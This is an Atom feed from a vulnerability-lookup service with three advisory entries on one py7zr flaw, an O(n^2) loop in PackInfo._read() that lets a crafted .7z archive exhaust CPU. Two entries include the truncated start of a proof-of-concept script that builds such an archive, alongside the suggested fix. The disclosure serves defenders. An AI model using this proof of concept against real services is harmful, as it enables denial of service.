<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
  <id>https://cve.radiocsirt.org/rss/recent/all/10</id>
  <title>Most recent entries from all</title>
  <updated>2026-10-06T06:18:39.368051+00:00</updated>
  <author>
    <name>Vulnerability-Lookup</name>
    <email>csirt@opendfir.org</email>
  </author>
  <link href="https://cve.radiocsirt.org" rel="alternate"/>
  <generator uri="https://lkiesow.github.io/python-feedgen" version="1.0.0">python-feedgen</generator>
  <subtitle>Contains only the most 10 recent entries.</subtitle>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/brew-aqtinstall-cve-2026-55206</id>
    <title>BREW-aqtinstall-CVE-2026-55206 — py7zr: O(n^2) algorithmic complexity DoS in PackInfo._read()</title>
    <updated>2026-10-06T06:18:39.414651+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> Homebrew: aqtinstall</p>
<p>### Summary</p>
<p>PackInfo._read() uses an O(n^2) cumulative sum pattern where
  numstreams is read directly from the archive header. A crafted .7z
  archive with a large numstreams value causes excessive CPU consumption
   during SevenZipFile.__init__() — no extraction is needed. A 50 KB
  archive takes ~7 seconds of CPU time.</p>
<p>### Details</p>
<p>The vulnerable code is in PackInfo._read() (archiveinfo.py):</p>
<p>self.packpositions = [sum(self.packsizes[:i]) for i in
  range(self.numstreams + 1)]</p>
<p>numstreams is parsed from the archive header via read_uint64() and is
  attacker-controlled. Each sum(self.packsizes[:i]) re-sums from the
  beginning, producing O(n^2) total work. This runs during header
  parsing in SevenZipFile.__init__(), before any extraction.</p>
<p>Suggested fix — replace with O(n) cumulative sum:</p>
<p>from itertools import accumulate
  self.packpositions = [0] + list(accumulate(self.packsizes))
### PoC
``` import struct, io, binascii, time
  import py7zr
  from py7zr.archiveinfo import write_uint64, PROPERTY</p>
<p>MAGIC = b'\x37\x7a\xbc\xaf\x27\x1c'</p>
<p>def encode_uint64(v):
      buf = io.BytesIO()
      write_uint64(buf, v)
      return buf.getvalue()</p>
<p>def build_7z_with_streams(numstreams):
      header = io.BytesIO()
      header.write(PROPERTY.HEADER)
      header.write(PROPERTY.MAIN_STREAMS_INFO)
      header.write(PROPERTY.PACK_INFO)
      header.write(encode_uint64(0))
      header.write(encode_uint64(numstreams))
      header.write(PROPERTY.SIZE)
      for _ in range…</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/brew-aqtinstall-cve-2026-55206"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/cve-2026-55206</id>
    <title>CVE-2026-55206 — py7zr: O(n^2) algorithmic complexity DoS in PackInfo._read()</title>
    <updated>2026-10-06T06:18:39.414816+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> miurahr py7zr</p>
<p>py7zr is a Python-based library and utility to support 7zip archive compression, decompression, encryption and decryption. Prior to 1.1.3, PackInfo._read() in archiveinfo.py used an O(n^2) cumulative sum pattern for attacker-controlled numstreams values parsed from archive headers, allowing a crafted .7z archive to cause excessive CPU consumption during SevenZipFile.init() before extraction. This issue is fixed in version 1.1.3.</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/cve-2026-55206"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/ghsa-h4gh-22qq-72r7</id>
    <title>GHSA-h4gh-22qq-72r7 — py7zr: O(n^2) algorithmic complexity DoS in PackInfo._read()</title>
    <updated>2026-10-06T06:18:39.414867+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> PyPI: py7zr</p>
<p>### Summary</p>
<p>PackInfo._read() uses an O(n^2) cumulative sum pattern where
  numstreams is read directly from the archive header. A crafted .7z
  archive with a large numstreams value causes excessive CPU consumption
   during SevenZipFile.__init__() — no extraction is needed. A 50 KB
  archive takes ~7 seconds of CPU time.</p>
<p>### Details</p>
<p>The vulnerable code is in PackInfo._read() (archiveinfo.py):</p>
<p>self.packpositions = [sum(self.packsizes[:i]) for i in
  range(self.numstreams + 1)]</p>
<p>numstreams is parsed from the archive header via read_uint64() and is
  attacker-controlled. Each sum(self.packsizes[:i]) re-sums from the
  beginning, producing O(n^2) total work. This runs during header
  parsing in SevenZipFile.__init__(), before any extraction.</p>
<p>Suggested fix — replace with O(n) cumulative sum:</p>
<p>from itertools import accumulate
  self.packpositions = [0] + list(accumulate(self.packsizes))
### PoC
``` import struct, io, binascii, time
  import py7zr
  from py7zr.archiveinfo import write_uint64, PROPERTY</p>
<p>MAGIC = b'\x37\x7a\xbc\xaf\x27\x1c'</p>
<p>def encode_uint64(v):
      buf = io.BytesIO()
      write_uint64(buf, v)
      return buf.getvalue()</p>
<p>def build_7z_with_streams(numstreams):
      header = io.BytesIO()
      header.write(PROPERTY.HEADER)
      header.write(PROPERTY.MAIN_STREAMS_INFO)
      header.write(PROPERTY.PACK_INFO)
      header.write(encode_uint64(0))
      header.write(encode_uint64(numstreams))
      header.write(PROPERTY.SIZE)
      for _ in range…</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/ghsa-h4gh-22qq-72r7"/>
  </entry>
</feed>
